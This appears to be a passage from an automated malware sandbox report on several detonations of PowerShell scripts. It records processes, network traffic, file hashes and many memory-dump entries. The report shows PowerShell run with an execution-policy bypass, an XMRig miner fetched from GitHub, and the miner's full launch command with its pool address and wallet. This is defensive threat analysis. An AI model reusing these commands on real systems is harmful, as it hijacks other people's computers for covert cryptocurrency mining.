| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1060-46-0x000001F9BE5C0000-0x000001F9BE5E0000-memory.dmp
memory/1060-47-0x000001F9BE600000-0x000001F9BE620000-memory.dmp
memory/1060-48-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/4468-49-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/1060-51-0x000001F9BFEE0000-0x000001F9BFF00000-memory.dmp
memory/1060-50-0x000001F9BFF00000-0x000001F9BFF20000-memory.dmp
memory/4468-53-0x00007FFA23E73000-0x00007FFA23E75000-memory.dmp
memory/1060-52-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-54-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-55-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-57-0x000001F9BFEE0000-0x000001F9BFF00000-memory.dmp
memory/1060-56-0x000001F9BFF00000-0x000001F9BFF20000-memory.dmp
memory/1060-58-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-59-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-60-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-61-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-62-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-63-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-64-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-65-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-66-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-67-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-68-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-69-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-70-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-71-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-72-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-73-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-74-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-75-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-76-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-77-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-78-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-79-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-80-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-81-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-82-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-83-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-84-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-85-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-86-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-87-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-88-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-89-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-90-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-91-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-92-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-93-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-94-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-95-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-96-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-97-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-98-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-99-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-100-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-101-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-102-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-103-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-104-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-105-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-106-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-107-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-108-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-109-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-110-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-111-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-112-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-113-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-114-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-115-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-116-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:39
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
Network
Files
memory/2756-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2756-5-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2756-6-0x00000000028F0000-0x00000000028F8000-memory.dmp
memory/2756-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2756-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2756-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2756-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2756-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:41
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4748 wrote to memory of 5080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4748 wrote to memory of 5080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/4748-0-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp
memory/4748-5-0x000001DF02B60000-0x000001DF02B82000-memory.dmp
memory/4748-8-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp
memory/4748-9-0x000001DF1B360000-0x000001DF1B3D6000-memory.dmp
memory/4748-10-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqb4bwfg.ifi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4748-26-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp
memory/4748-49-0x000001DF1B300000-0x000001DF1B312000-memory.dmp
memory/4748-62-0x000001DF1B2E0000-0x000001DF1B2EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5080-91-0x0000027D62BB0000-0x0000027D62BD0000-memory.dmp
memory/5080-92-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/4748-94-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp
memory/4748-93-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp
memory/5080-95-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/4748-96-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp
memory/5080-97-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-98-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-99-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-100-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-101-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-102-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-103-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-104-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-105-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-106-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-107-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-108-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-109-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-110-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-111-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-112-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-113-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-114-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-115-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-116-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-117-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-118-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-119-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-120-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-121-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-122-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-123-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-124-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-125-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-126-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-127-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-128-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-129-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-130-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-131-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-132-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-133-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-134-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-135-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-136-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-137-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-138-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-139-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-140-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-141-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-142-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-143-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-144-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-145-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-146-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-147-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-148-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-149-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-150-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-151-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-152-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-153-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-154-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-155-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-156-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
memory/5080-157-0x00007FF6DFE90000-0x00007FF6E0AC3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:40
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4536 wrote to memory of 4272 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4536 wrote to memory of 4272 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
memory/4536-0-0x00007FFA19893000-0x00007FFA19895000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5wziq0n.oaj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4536-6-0x00000143EF150000-0x00000143EF172000-memory.dmp
memory/4536-11-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
memory/4536-12-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
memory/4536-14-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
memory/4536-15-0x00000143EF650000-0x00000143EF662000-memory.dmp
memory/4536-16-0x00000143EF1A0000-0x00000143EF1AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4272-47-0x000002CA8AEE0000-0x000002CA8AF00000-memory.dmp
memory/4272-48-0x000002CA8B030000-0x000002CA8B050000-memory.dmp
memory/4272-49-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4536-50-0x00007FFA19893000-0x00007FFA19895000-memory.dmp
memory/4536-51-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
memory/4272-53-0x000002CA8B070000-0x000002CA8B090000-memory.dmp
memory/4272-52-0x000002CA8B050000-0x000002CA8B070000-memory.dmp
memory/4272-54-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-55-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
